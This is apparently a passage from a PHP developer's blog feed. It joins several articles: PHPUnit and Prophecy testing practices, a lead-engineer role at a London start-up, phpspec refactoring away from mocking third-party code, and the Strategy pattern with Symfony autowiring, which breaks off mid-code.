✔ It fails when raw username is too short (< 4 characters)
✔ It fails when raw username is too long (> 15 characters)
Follow Coding Standards to ensure consistency across the PHP ecosystem and internal projects.
Here are examples of topics you can debate:
- `declare(strict_types=1)` to prevent type coercion bugs that can cause tests to pass when they shouldn't
- `$this` over `self` to call PHPUnit assertions
- the `#[Test]` attribute and `it_` prefix to help name test methods in an articulate way

FIRST properties of Unit Tests: they should be Fast, Isolated, Repeatable, Self-validating, and Timely.
Follow AAA (Arrange, Act, Assert): each test method should group these functional sections, separated by blank lines.
Not necessarily in that order (eg when testing exceptions: Arrange, Expect, Act).
DRY vs DAMP (aka WET), it's all about finding the right balance: pick whichever is more readable, on a case-by-case basis.
"DRY (Don't Repeat Yourself) increases maintainability by isolating change (risk) to only those parts of the system that must change.
DAMP (Descriptive And Meaningful Phrases, aka WET: We Edit Twice) increases maintainability by reducing the time necessary to read and understand the code."
— Chris Edwards
Note: this is "In My Humble Opinion".
There are two Test Driven Development (TDD) schools of thought: the Classicist (Detroit) school and the Mockist (London) school.
The mocking library Prophecy's expressive syntax allows for an approach that's more aligned with spec BDD.
It can be used in PHPUnit with the phpspec/prophecy-phpunit package.
Argument::type(ClassName::class): matches by typeArgument::that(static fn ($v): bool => ...): matches with a custom closureArgument::any(): matches anything<?php
declare(strict_types=1);
namespace App\Tests\Unit;
use Prophecy\Argument;
use Prophecy\PhpUnit\ProphecyTrait;
use PHPUnit\Framework\Attributes\CoversClass;
use PHPUnit\Framework\Attributes\Small;
use PHPUnit\Framework\TestCase;
#[CoversClass(SignInPlayerHandler::class)]
#[Small]
final class SignInPlayerHandlerTest extends TestCase
{
use ProphecyTrait;
public function test_it_signs_in_player(): void
{
$username = UsernameFixture::makeString();
$player = PlayerFixture::make();
// Stub: configure return value
$findPlayer = $this->prophesize(FindPlayer::class);
$findPlayer->find(
Argument::that(static fn (Username $u): bool => $u->toString() === $username),
)->willReturn($player);
// Mock: assert it gets called
$saveAuthToken = $this->prophesize(SaveAuthToken::class);
$saveAuthToken->save(Argument::type(AuthToken::class))
->shouldBeCalled();
$signInPlayerHandler = new SignInPlayerHandler(
$findPlayer->reveal(),
$saveAuthToken->reveal(),
);
$signedInPlayer = $signInPlayerHandler->run(new SignInPlayer(
$username,
));
$this->assertInstanceOf(SignedInPlayer::class, $signedInPlayer);
}
}
🤫 Super Secret Tip:
PHPUnit instantiates the test class once per test method and once per data provider row. This is a fundamental design decision that prioritizes test isolation over performance.
So if you have:
- 5 regular test methods: that's 5 instances
- 1 test method with 10 data provider rows: that's 10 instances
- Total: 15 instances created
Why This Matters:
- Performance: expensive `setUp()` and constructors will have a measurable impact
- Memory Usage: each instance holds its own state in memory until the end of the testsuite run
- Test Isolation: ensures no state leakage between tests (the main benefit)
Since each test method creates a new instance, expensive operations compound quickly. Watch out for:
- repeated kernel booting
- database connections
- fixture loading (especially when Doctrine ORM Entity hydration is involved)
- external API calls
You can use singletons for stateless services, transactions for database cleanup, and mocks for external dependencies. The example below uses `TestKernelSingleton::get()` to share a stateless application instance across the entire testsuite.
Note: this is the pragmatic approach.
For controllers and commands, there's no need to mock internal dependencies or assert on complex business logic.
Just craft the input, pass it to the application, and verify the status code.
This tests the entire request-response cycle: routing, middleware, validation, business logic, serialization... everything.
Here's an integration test for a POST /api/v1/actions/sign-up-new-player endpoint controller:
<?php
declare(strict_types=1);
namespace App\Tests\Integration\Controller;
use PHPUnit\Framework\Attributes\CoversNothing;
use PHPUnit\Framework\Attributes\Medium;
use PHPUnit\Framework\TestCase;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
#[CoversNothing]
#[Medium]
final class SignUpNewPlayerControllerTest extends TestCase
{
public function test_it_signs_up_a_new_player(): void
{
$appKernel = TestKernelSingleton::get()->appKernel();
$request = Request::create(
uri: '/api/v1/actions/sign-up-new-player',
method: 'POST',
server: ['CONTENT_TYPE' => 'application/json'],
content: json_encode([
'username' => UsernameFixture::makeString(),
'password' => PasswordPlainFixture::makeString(),
], \JSON_THROW_ON_ERROR),
);
$response = $appKernel->handle($request);
$this->assertSame(Response::HTTP_CREATED, $response->getStatusCode(), (string) $response->getContent());
}
}
And here's an integration test for a ./bin/console action:sign-up-new-player CLI command:
<?php
declare(strict_types=1);
namespace App\Tests\Integration\Cli;
use PHPUnit\Framework\Attributes\CoversNothing;
use PHPUnit\Framework\Attributes\Medium;
use PHPUnit\Framework\TestCase;
use Symfony\Component\Console\Command\Command;
#[CoversNothing]
#[Medium]
final class SignUpNewPlayerCommandTest extends TestCase
{
public function test_it_signs_up_a_new_player(): void
{
$application = TestKernelSingleton::get()->application();
$application->run([
'command' => 'action:sign-up-new-player',
'username' => UsernameFixture::makeString(),
'password' => PasswordPlainFixture::makeString(),
]);
$this->assertSame(Command::SUCCESS, $application->getStatusCode());
}
}
phpunit
# Configuration:
--generate-configuration Generate configuration file with suggested settings
--migrate-configuration Migrate configuration file to current format
# Selection:
--list-groups List available test groups
--group small Only run tests from the specified group(s)
--exclude-group small Exclude tests from the specified group(s)
--list-tests List available tests
--covers 'Username' Only run tests that intend to cover <name>
--filter 'UsernameTest' Filter which tests to run (test class, or test method)
--filter 'test_it_can_be_converted_from_and_to_string'
## Useful for running testsuites individually, in the CI
--list-testsuites List available testsuites
--testsuite unit Only run tests from the specified testsuite(s)
--exclude-testsuite unit Exclude tests from the specified testsuite(s)
# Execution
--stop-on-failure Stop after first failure
--order-by <order> Run tests in order: default|defects|depends|duration|no-depends|random|reverse|size
# Reporting
--no-progress Disable output of test execution progress (the dots)
--testdox Replace default result output with TestDox format
Order By options:
- `default`: tests run in the order they're discovered (filesystem order, typically alphabetical)
- `defects`: previously failed/errored tests run first (requires `--cache-result` to remember past failures)
- `depends`: tests with dependencies run after their dependencies, non-dependent tests run first
- `duration`: fastest tests run first, slowest tests run last (requires `--cache-result` to remember execution times)
- `no-depends`: ignores test dependencies and runs tests in discovery order
- `random`: tests run in random order (use `--random-order-seed <N>` for reproducible randomness)
- `reverse`: tests run in reverse discovery order
- `size`: tests run by size: `#[Small]`, then `#[Medium]`, then `#[Large]`, and finally unsized tests

Worth noting: options can be combined, eg `--order-by=depends,defects`.
<?xml version="1.0" encoding="UTF-8"?>
<!-- https://phpunit.readthedocs.io/en/latest/configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="vendor/phpunit/phpunit/phpunit.xsd"
bootstrap="tests/bootstrap.php"
cacheDirectory=".phpunit.cache"
executionOrder="depends,defects"
requireCoverageMetadata="true"
beStrictAboutCoverageMetadata="true"
beStrictAboutOutputDuringTests="true"
displayDetailsOnPhpunitDeprecations="true"
failOnPhpunitDeprecation="true"
failOnRisky="true"
failOnWarning="true"
shortenArraysForExportThreshold="10"
colors="true"
>
<php>
<!-- Useful for CI environments -->
<ini name="display_errors" value="1" />
<ini name="error_reporting" value="-1" />
<!-- Useful for Symfony -->
<env name="KERNEL_CLASS" value="App\Kernel" />
<env name="APP_ENV" value="test" force="true" />
<env name="APP_DEBUG" value="0" force="true" />
<env name="SHELL_VERBOSITY" value="-1" />
</php>
<testsuites>
<testsuite name="unit">
<directory>tests/Unit</directory>
</testsuite>
<testsuite name="integration">
<directory>tests/Integration</directory>
</testsuite>
</testsuites>
<source
ignoreIndirectDeprecations="true"
restrictNotices="true"
restrictWarnings="true"
>
<include>
<directory>src</directory>
</include>
</source>
</phpunit>
Notes:
- `bootstrap` defaults to `vendor/autoload.php`
- `shortenArraysForExportThreshold` defaults to `0` from v11.3 and `10` from v12
- `colors` defaults to `false`, for automated/scripted environment compatibility
TL;DR: Arrr, PHP be a cunning pirate, pilferin' ideas from other languages to stay ahead o' the fleet. 'Tis true, PHP is no bonny innovator, but it be masterful at plunderin' and adaptin' features, keepin' its sails full and its reputation mighty in the tech seas.
Pádraic Brady. 2012. PHP: a Pillagin Pirate
PHP has a long history of adopting, porting, and emulating successful ideas and tools from other technologies, often resulting in robust implementations that fit the PHP ecosystem.
Here are some examples:
Those are old and established examples, but as long as there are creative PHP developers out there, there'll still be more treasures to purloin.
For example, I've recently stumbled upon Dan Leech's port of Ratatui (Rust): PHP-tui (2024).
There's no reason to stop there.
So, what's the next innovation? What other brand new and shiny (or ancient and rusty) idea can we, PHP Pirates, bring to our colourful ecosystem?
]]>In September 2014, I left SensioLabs (the creator of the Symfony Framework) to work as a PHP/Symfony Developer at Foodity, a London start-up that created a service allowing people to add ingredients from online recipes to the basket of the retailer of their choice.
After 9 months, I pitched an idea to the CEO: we had a platform that theoretically allowed us to add ANY product to the basket, not just food items. We called it Smart Product.
So I was given the opportunity to build a Proof of Concept. Once completed and launched, it proved successful, and I was promoted to "Lead PHP Engineer", in charge of a small team to develop it further.
And so in June 2015, Foodity pivoted and became Constant Commerce, with Smart Product being one of its main products.
Later, in August 2018, the start-up pivoted again and became Constant.Co: my team and I were given the responsibility to design and develop the API for its new main product: Landing Space.
This article is about my role as a Lead PHP Engineer during that time, and what my job and responsibilities were about, on a day to day basis.
As a lead developer, my responsibilities were:
The company as a whole worked in Cycles: each Cycle is 6 weeks long and contains three 2-week Sprints.
Prior to the Cycle (ie during the previous cycle), the CEO, Sales and Product would flesh out a milestone to achieve. Meetings between the CEO, Sales, Product, Technical Leads and QA would be held to identify the user stories and their acceptance criteria.
As a Lead Developer, my role in this meeting was to assess the feasibility of the features described, evaluate how the new requirements would affect the existing code base (ie whether parts were already implemented, how to manage the technical debt, etc) and provide technical guidance.
Architecture meetings between Product, Technical Leads and QA would be held to write technical specifications.
As a Lead Developer, my role in this meeting was to collaborate with other teams on how to best integrate the different systems, document the requirements, identify and resolve performance bottlenecks, security vulnerabilities, and other technical issues.
When the Cycle starts, so does the first Sprint: a Sprint Planning meeting is held between Product, the technical teams and QA, where User Stories are picked from the backlog, given estimated Complexity Points, and assigned to developers. Once the Team Capacity (based on previous Velocity) is reached, development can start.
I'd start by picking a ticket and moving it to "In Progress".
I'd then write an integration test that fits one of the User Story's Acceptance Criteria. Usually the first test is about a "Happy Scenario": what we expect. Following tests would be about "Unhappy Scenarios", trying to identify edge cases. Then I'd run them to make sure they fail for the right reasons (ie because the code isn't written yet).
Next I'd write a unit test. Run it to make sure it fails for the right reason.
After that I'd write the code for that test. And run the test suite to make sure it fulfils the new requirements without breaking the previous ones.
Once the tests pass, I can add new scenarios to my test suite, and start the process again, until everything is covered, and only then I'd also consider refactoring the code to ensure the maintainability of the project.
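As a minimal, framework-free illustration of that red-green loop, here's an invented example (a hypothetical Slugifier class, with a plain assert() standing in for the test framework):

```php
<?php

// Step 1 (red): write the test first. With Slugifier::slugify() not yet
// written, it fails for the right reason: the code doesn't exist.
// Step 2 (green): write just enough code to make it pass.
final class Slugifier
{
    public function slugify(string $title): string
    {
        // Just enough code: lowercase, then collapse non-alphanumeric runs into dashes
        return trim(preg_replace('/[^a-z0-9]+/', '-', strtolower($title)), '-');
    }
}

// The "test": a plain assertion standing in for a PHPUnit test method
$slugifier = new Slugifier();
assert('hello-world' === $slugifier->slugify('Hello, World!'));
// Step 3: add more scenarios (unhappy paths, edge cases), then refactor
```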
Finally, I can commit my work with a detailed message, push, create a Pull Request and assign it to someone for Code Review.
The ticket can now be moved to "Code Review".
I take this opportunity to check if there are any open Pull Requests waiting for me to review them.
First thing I do when reviewing a Pull Request is check the corresponding ticket to get familiar with the problem that it tries to solve.
I'd then pull the code to my local machine, execute the test suite and launch the application to navigate it and try the feature first hand.
Next, I have a look at the code, with the objective to answer these three questions:
The purpose of Code Reviews isn't to nitpick or force what you'd have done instead, but to help your co-worker:
There are two kinds of feedback that can be left:
Once the feedback from the first round has been taken into account, other rounds of Code Reviews can be done, but to get the feature deployed as early as possible it's important to focus these on identifying broken things and fixing them (rather than making more suggestions for improvements).
Finally, when the Pull Request is accepted, it can be merged and sent to QA.
As a Lead Developer, one of my responsibilities was the mentoring of team members.
One aspect of this was the preparation and delivery of training (Symfony, Git, Test Driven Development), but I'd also give (and encourage others to give) some presentations or lightning talks on different topics (libraries, practices, etc).
But one of my favourite tools was Pair Programming, which proved quite efficient when onboarding the junior developer. These would be short sessions, rather than whole days spent together, and we'd follow a strict Driver-Navigator rule (ie the one with the keyboard only writes what they agree to, while the other one explains the vision), switching regularly at first, and then per task as we became more synchronised.
]]>TL;DR: phpspec isn't a test framework. It's a code designing/modeling tool.
Looking at some 2014 code of mine, I found the following test:
<?php
namespace spec\Memio\SpecGen\CodeEditor;
use Gnugat\Redaktilo;
use Memio\Model;
use Memio\PrettyPrinter\PrettyPrinter;
use Memio\SpecGen\CodeEditor\InsertConstructor;
use Memio\SpecGen\CodeEditor\InsertConstructorHandler;
use Memio\SpecGen\CommandBus\CommandHandler;
use PhpSpec\ObjectBehavior;
class InsertConstructorHandlerSpec extends ObjectBehavior
{
function let(
Redaktilo\Editor $redaktiloEditor,
PrettyPrinter $prettyPrinter,
) {
$this->beConstructedWith($redaktiloEditor, $prettyPrinter);
}
function it_inserts_constructor_in_class_that_has_constants_and_methods(
Redaktilo\Editor $redaktiloEditor,
Redaktilo\File $redaktiloFile,
Model\Method $modelMethod,
PrettyPrinter $prettyPrinter,
) {
$insertConstructor = new InsertConstructor($redaktiloFile->getWrappedObject(), $modelMethod->getWrappedObject());
$generatedCode =<<<'GENERATED_CODE'
public function __construct(Dependency $dependency, string $redaktiloFilename)
{
$this->dependency = $dependency;
$this->filename = $redaktiloFilename;
}
GENERATED_CODE
;
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::CONSTRUCTOR, 0)->willReturn(false);
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->willReturn(true);
$redaktiloEditor->jumpBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->shouldBeCalled();
$redaktiloEditor->insertAbove($redaktiloFile, '')->shouldBeCalled();
$prettyPrinter->generateCode($modelMethod)->willReturn($generatedCode);
$redaktiloEditor->insertAbove($redaktiloFile, $generatedCode)->shouldBeCalled();
$redaktiloFile->decrementCurrentLineNumber(1)->shouldBeCalled();
$redaktiloFile->getLine()->willReturn(' const CONSTANT = 42;');
$redaktiloEditor->insertBelow($redaktiloFile, '')->shouldBeCalled();
$this->handle($insertConstructor);
}
}
There are some things that feel wrong there, like the calls to
getWrappedObject(), and when something feels wrong with phpspec, it usually
means that this thing is wrong.
As per the previous advice, don't mock SUT inputs,
I've removed the inputs mock and their awkward getWrappedObject() calls
and instead set up the inputs:
function it_inserts_constructor_in_class_that_has_constants_and_methods(
Redaktilo\Editor $redaktiloEditor,
PrettyPrinter $prettyPrinter,
) {
$redaktiloFile = Redaktilo\File::fromString(<<<'FILE'
<?php
namespace Vendor\Project;
class MyClass
{
const CONSTANT = 42;
public function existingMethod()
{
}
}
FILE
);
$modelMethod = (new Model\Method('__construct'))
->addArgument(new Model\Argument('Vendor\Project\Dependency', 'dependency'))
->addArgument(new Model\Argument('string', 'filename'))
;
$insertConstructor = new InsertConstructor($redaktiloFile, $modelMethod);
$generatedCode =<<<'GENERATED_CODE'
public function __construct(Dependency $dependency, string $redaktiloFilename)
{
$this->dependency = $dependency;
$this->filename = $redaktiloFilename;
}
GENERATED_CODE
;
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::CONSTRUCTOR, 0)->willReturn(false);
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->willReturn(true);
$redaktiloEditor->jumpBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->shouldBeCalled();
$redaktiloEditor->insertAbove($redaktiloFile, '')->shouldBeCalled();
$prettyPrinter->generateCode($modelMethod)->willReturn($generatedCode);
$redaktiloEditor->insertAbove($redaktiloFile, $generatedCode)->shouldBeCalled();
$redaktiloEditor->insertBelow($redaktiloFile, '')->shouldBeCalled();
$this->handle($insertConstructor);
}
Now pay attention to the two following lines we've removed:
$redaktiloFile->decrementCurrentLineNumber(1)->shouldBeCalled();
$redaktiloFile->getLine()->willReturn(' const CONSTANT = 42;');
After running the tests, I get an error:
Exception
Gnugat\Redaktilo\Exception\InvalidLineNumberException("The line number should be positive") has been thrown.
When the Redaktilo File is first instantiated in our test method, it is
initialised with a "current line number" set to 0. Since Redaktilo's Editor
is mocked, it doesn't update the file's "current line number" as it would in
a real situation. Our SUT, InsertConstructorHandler, however calls directly
decrementCurrentLineNumber on the file, which ends up trying to set
"current line number" to -1, hence the exception.
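To make that failure mode concrete, here's a toy, self-contained illustration of the invariant (a hypothetical sketch of a "current line number" guard, not Redaktilo's actual implementation):

```php
<?php

// Toy stand-in for Redaktilo's File invariant: a "current line number"
// that refuses to go below the first line (hypothetical sketch).
final class ToyFile
{
    private int $currentLineNumber = 0;

    public function decrementCurrentLineNumber(int $lines): void
    {
        $newLineNumber = $this->currentLineNumber - $lines;
        if ($newLineNumber < 0) {
            throw new \InvalidArgumentException('The line number should be positive');
        }
        $this->currentLineNumber = $newLineNumber;
    }

    public function getCurrentLineNumber(): int
    {
        return $this->currentLineNumber;
    }
}

$toyFile = new ToyFile();

try {
    // With a mocked Editor, nothing ever moved the line number off 0,
    // so decrementing immediately breaks the invariant:
    $toyFile->decrementCurrentLineNumber(1);
} catch (\InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL; // The line number should be positive
}
```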
To make the test pass, we could add a call to Redaktilo's File
setCurrentLineNumber(), for example:
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::CONSTRUCTOR, 0)->willReturn(false);
$redaktiloEditor->hasBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->willReturn(true);
$redaktiloEditor->jumpBelow($redaktiloFile, InsertConstructorHandler::METHOD, 0)->shouldBeCalled();
$redaktiloFile->setCurrentLineNumber(11);
$redaktiloEditor->insertAbove($redaktiloFile, '')->shouldBeCalled();
$prettyPrinter->generateCode($modelMethod)->willReturn($generatedCode);
$redaktiloEditor->insertAbove($redaktiloFile, $generatedCode)->shouldBeCalled();
$redaktiloEditor->insertBelow($redaktiloFile, '')->shouldBeCalled();
But this feels wrong, and when something feels wrong with phpspec, it usually means that this thing is wrong. But what?
Let's take a step back and look at the test again. What are we trying to achieve here?
It is a test method, written with phpspec, that checks assertions on the
implementation details of the class under test InsertConstructorHandler,
by setting up mocks for the Redaktilo library.
2014 me would think that's perfectly reasonable, and would probably struggle to identify the issue. But 2024 me can tell straight away from the above paragraph what the issue is.
I've actually always had some issue understanding the advice "don't mock what you don't own". How do we really define what we own, and what we don't?
The answer to these questions probably depends on the context, but here in
InsertConstructorHandler, it certainly feels like Redaktilo, a third party
library (which I've developed), is "something that I don't own" and therefore
shouldn't be mocked.
Now that we have identified the problem, how do we fix it?
Let's re-read the first paragraph of the previous section, and more specifically:
It is a test method, written with phpspec, that checks assertions on the implementation details of the class under test
InsertConstructorHandler, by setting up mocks for the Redaktilo library.
And when reading the test method, we get a lot of "has below" and "jump below" and "insert above". This is all implementation detail. And this is all Redaktilo's (clunky) language.
Our test method is a one-to-one translation of the implementation details.
phpspec is a specBDD framework. One of the core ideas of Behaviour Driven Development is to drop the "unit testing" terminology and use a slightly different vocabulary instead:
See Liz Keogh. 2009. Translating TDD to BDD
This might not seem like much, or very useful, but in reality the language used is key to changing our perspective.
To be able to have an example that checks expectations on a specific use case, we first need to define the behaviour we want to describe in plain English:
If the class doesn't already have a constructor,
But it has an existing method,
As well as potentially a constant or property definition,
Then the generated code for the new constructor
Should be inserted above the existing method, separated by an empty line,
And it should also be under the constant and property definitions, also separated by an empty line.
We then try our best to translate that into code. To use the exact same vocabulary. This cannot be done by mocking Redaktilo, which has its own vocabulary.
So we have to extract the Redaktilo implementation details and hide them in classes that have descriptive names which are relevant to our use case.
Creating a new abstraction layer, essentially.
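For illustration, here's a minimal sketch of what one of those wrapper classes could look like. This is a toy stand-in: it checks the source with a regular expression so the example is self-contained, whereas the real implementation delegates to Redaktilo's Editor, and the method signature here is simplified to a plain string.

```php
<?php

// Hypothetical sketch: hides the "does the class already have a constructor?"
// implementation detail behind a descriptively named class.
// A real implementation would delegate to Redaktilo's Editor;
// this toy version uses a regex stand-in so the example runs standalone.
final class DoesClassAlreadyHaveConstructor
{
    public function check(string $inFileContents): bool
    {
        return 1 === preg_match('/function\s+__construct\s*\(/', $inFileContents);
    }
}

$doesClassAlreadyHaveConstructor = new DoesClassAlreadyHaveConstructor();

var_dump($doesClassAlreadyHaveConstructor->check('class A { public function existingMethod() {} }'));
// bool(false)
var_dump($doesClassAlreadyHaveConstructor->check('class B { public function __construct() {} }'));
// bool(true)
```

The point isn't the regex, it's the name: the test can now speak the use case's language ("does the class already have a constructor?") instead of Redaktilo's ("has below", "jump below").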
Here's our new and improved "example":
function it_inserts_constructor_above_methods_but_under_constants_and_properties(
DoesClassAlreadyHaveConstructor $doesClassAlreadyHaveConstructor,
DoesClassAlreadyHaveMethods $doesClassAlreadyHaveMethod,
PrettyPrinter $prettyPrinter,
InsertGeneratedConstructorAboveExistingMethods $insertGeneratedConstructorAboveExistingMethods,
) {
$inFile = Redaktilo\File::fromString(<<<'FILE'
<?php
namespace Vendor\Project;
class MyClass
{
const CONSTANT = 42;
public function existingMethod()
{
}
}
FILE
);
$modelConstructor = (new Model\Method('__construct'))
->addArgument(new Model\Argument('Vendor\Project\Dependency', 'dependency'))
->addArgument(new Model\Argument('string', 'filename'))
;
$insertConstructor = new InsertConstructor($inFile, $modelConstructor);
$generatedConstructor =<<<'GENERATED_CODE'
public function __construct(Dependency $dependency, string $redaktiloFilename)
{
$this->dependency = $dependency;
$this->filename = $redaktiloFilename;
}
GENERATED_CODE
;
$doesClassAlreadyHaveConstructor->check($inFile)->willReturn(false);
$doesClassAlreadyHaveMethod->check($inFile)->willReturn(true);
$prettyPrinter->generateCode($modelConstructor)->willReturn($generatedConstructor);
$insertGeneratedConstructorAboveExistingMethods->insert($generatedConstructor, $inFile)->shouldBeCalled();
$this->handle($insertConstructor);
}
It no longer has Redaktilo\Editor.
It now has:
- DoesClassAlreadyHaveConstructor->check(Redaktilo\File $inFile): bool, which wraps:
  $this->redaktiloEditor->hasBelow($inFile, InsertConstructorHandler::CONSTRUCTOR, 0);
- DoesClassAlreadyHaveMethods->check(Redaktilo\File $inFile): bool, which wraps:
  $this->redaktiloEditor->hasBelow($inFile, InsertConstructorHandler::METHOD, 0);
- InsertGeneratedConstructorAboveExistingMethods->insert(string $generatedConstructor, Redaktilo\File $inFile): void, which wraps:
  $this->redaktiloEditor->jumpBelow($inFile, InsertConstructorHandler::METHOD, 0);
  $this->redaktiloEditor->insertAbove($inFile, '');
  $this->redaktiloEditor->insertAbove($inFile, $generatedCode);
  $this->redaktiloEditor->insertBelow($inFile, '');
And it still has:
- Model\Method: this is one of the inputs of our use case, it seems fine as is
- Redaktilo\File: though the variable has been renamed to $inFile
- PrettyPrinter: as far as I can tell, this collaborator still describes the behaviour we want
I've also taken the liberty to rename a couple of things, to make the intent more explicit:
- $redaktiloFile becomes $inFile: I've taken a liking to having code read like sentences ("insert generated code in file")
- it_inserts_constructor_in_class_that_has_constants_and_methods becomes it_inserts_constructor_above_methods_but_under_constants_and_properties, as I think that describes the use case a bit better (though in the implementation, we end up not caring about constants and properties, as we generate the constructor above methods, which we expect to be below constants and properties)
But there are more changes that have been introduced as a result of this new abstraction layer. On the positive side, we got:
On the negative side:
- additional classes would be needed (eg an InsertGeneratedConstructorAtTheEndOfTheClass, when there are no methods in the class)
While there is value in the code at the beginning of this article, as it worked just fine as it was, I personally value the new version more, even with the drawbacks it brings.
Having an executable specification that results in a code that explicitly describes its intent is, in my humble opinion, quite a worthy improvement indeed.
Note: also, while the initial version of the code "worked", it did come with its own drawbacks. It takes some time to understand what the code does (the "jump above and below" mumbo jumbo isn't very helpful), and it was coupled to a third party library, meaning tying us to its upgrade policy and making us subject to its backward incompatible changes.
phpspec is highly opinionated, has very intentional "limitations", and has this knack of making you feel like something is wrong -- when you're indeed doing something you shouldn't be doing.
It's not a testing framework, no, it's a designing / modeling tool.
]]><?php
namespace spec\Memio\SpecGen\GenerateMethod;
use Memio\Model\File;
use Memio\Model\Method;
use Memio\Model\Objekt;
use Memio\SpecGen\GenerateMethod\GeneratedMethod;
use PhpSpec\Console\ConsoleIO;
use PhpSpec\ObjectBehavior;
class LogGeneratedMethodListenerSpec extends ObjectBehavior
{
function let(ConsoleIO $io)
{
$this->beConstructedWith($io);
}
function it_logs_the_generated_method(ConsoleIO $io, File $file, Method $method, Objekt $object)
{
$className = 'Vendor\Project\MyClass';
$methodName = 'myMethod';
$generatedMethod = new GeneratedMethod($file->getWrappedObject());
$file->getStructure()->willReturn($object);
$object->getName()->willReturn($className);
$object->allMethods()->willReturn([$method]);
$method->getName()->willReturn($methodName);
$io->write(<<<OUTPUT
<info>Generated <value>{$className}#{$methodName}</value></info>
OUTPUT
)->shouldBeCalled();
$this->onGeneratedMethod($generatedMethod);
}
}
And while reading it, one of the things that caught my attention was the setting up of mocks for SUT inputs (SUT means System Under Test, the class we're testing).
The purpose of this test is to specify how LogGeneratedMethodListener should
behave, through its interactions with the ConsoleIO collaborator.
But here, it's also specifying how LogGeneratedMethodListener interacts
with the input parameter GeneratedMethod.
GeneratedMethod encapsulates data relevant to the process of generating the
code for a Method. It doesn't have any critical behaviour:
we just call getters on it.
So my advice to you (me, from the past) would be to not bother creating Mocks for it:
<?php
namespace spec\Memio\SpecGen\GenerateMethod;
use Memio\Model\File;
use Memio\Model\Method;
use Memio\Model\Objekt;
use Memio\SpecGen\GenerateMethod\GeneratedMethod;
use PhpSpec\Console\ConsoleIO;
use PhpSpec\ObjectBehavior;
class LogGeneratedMethodListenerSpec extends ObjectBehavior
{
function let(ConsoleIO $io)
{
$this->beConstructedWith($io);
}
function it_logs_the_generated_method(ConsoleIO $io)
{
$className = 'Vendor\Project\MyClass';
$methodName = 'myMethod';
$generatedMethod = new GeneratedMethod((new File('src/MyClass.php'))
->setStructure((new Objekt($className))
->addMethod(new Method($methodName))
)
);
$io->write(<<<OUTPUT
<info>Generated <value>{$className}#{$methodName}</value></info>
OUTPUT
)->shouldBeCalled();
$this->onGeneratedMethod($generatedMethod);
}
}
]]>TL;DR: Since Symfony 5.3
Tag the "Strategy" Interface with the attribute #[AutoconfigureTag]:
<?php
use Symfony\Component\DependencyInjection\Attribute\AutoconfigureTag;
#[AutoconfigureTag]
interface Strategy
{
// Add your Strategy methods below, for example
// (please use a more descriptive name than "algorithm"...):
public function algorithm();
// *IF* your Strategies need to be executed in a specific order,
// then add a method that returns the priority (highest priority first, lowest priority last)
// Note: it MUST be static
public static function getDefaultPriority(): int;
// *IF* your Strategies are executed conditionally,
// then add a "predicate" method (eg named `supports()`):
public function predicate($input): bool;
}
Inject the iterable that contains all tagged "Strategy" implementations
in the "Context"'s constructor with the attribute #[TaggedIterator(<tag>)]:
<?php
class Context
{
public function __construct(
// *IF* your Strategies need to be executed in a specific order,
// then use the `defaultPriorityMethod` parameter and set it with the Strategy's static method name
#[TaggedIterator(Strategy::class, defaultPriorityMethod: 'getDefaultPriority')]
private iterable $strategies,
) {
}
public function operation($input)
{
foreach ($this->strategies as $strategy) {
// *IF* your Strategies need to be executed conditionally,
// then add a if statement that verifies the Strategy's predicate method
if ($strategy->predicate($input)) {
$strategy->algorithm();
// *IF* you only want the first matching Strategy to be executed,
// then break the loop here
break;
}
}
}
}
Set autowire and autoconfigure parameters to be true in the DIC configuration:
services:
_defaults:
autowire: true
autoconfigure: true
The Strategy Pattern can be really useful when you want to avoid multiple conditionals, and/or when you want to add new repetitive chunks of logic in a maintainable way.
Let's see how to use it in a Symfony application, and how autowiring can help us configure it.
Note that the code snippets below will NOT be truncated, they'll always contain
the full code (so no things like // rest of the class below comments).
Some classes are just bound to contain repeated chunks of similar logic:
<?php
class EmailDailyReports
{
public function __construct(
private BuildSpreadsheet $buildSpreadsheet,
private Mailer $mailer,
private WriteSpreadsheet $writeSpreadsheet,
private RetrieveDataForReportOne $retrieveDataForReportOne,
private RetrieveDataForReportTwo $retrieveDataForReportTwo,
) {
}
public function send(\DateTime $startDate, \DateTime $endDate): void
{
$reportOneData = $this->retrieveDataForReportOne->fromDatabase($startDate, $endDate);
$reportOneName = 'Report One';
$reportOneSpreadsheet = $this->buildSpreadsheet->using($reportOneData, $reportOneName);
$reportOneFilename = $this->writeSpreadsheet->save($reportOneSpreadsheet);
$reportTwoData = $this->retrieveDataForReportTwo->fromDatabase($startDate, $endDate);
$reportTwoName = 'Report Two';
$reportTwoSpreadsheet = $this->buildSpreadsheet->using($reportTwoData, $reportTwoName);
$reportTwoFilename = $this->writeSpreadsheet->save($reportTwoSpreadsheet);
$email = (new Email())
->from('sender@example.com')
->to('recipient@example.com')
->attachFromPath($reportOneFilename, $reportOneName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
->attachFromPath($reportTwoFilename, $reportTwoName, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')
->subject('Daily Reports')
->text('Find reports in attached files');
$this->mailer->send($email);
}
}
This EmailDailyReports class builds spreadsheets and sends emails for reports.
The retrieval of the data for each report is delegated to a dedicated service.
This is fine as is, with currently only 2 reports to manage... But what if we need to add 1 more report? 2 more reports? 30 more reports?
This use case is the perfect candidate for the Strategy Pattern.
EmailDailyReports would be considered the "Context" class,
and the services that retrieve the report data would be the "Strategies".
Let's refactor EmailDailyReports to implement this design pattern.
First we create a Strategy interface:
<?php
interface RetrieveDataForReport
{
public function fromDatabase(\DateTime $startDate, \DateTime $endDate): array;
public function getName(): string;
}
Then we make sure the Strategy implementations both implement it
(RetrieveDataForReportOne and RetrieveDataForReportTwo).
Finally we refactor the Context class to be injected with a collection of Strategies, and iterate through them:
<?php
class EmailDailyReports
{
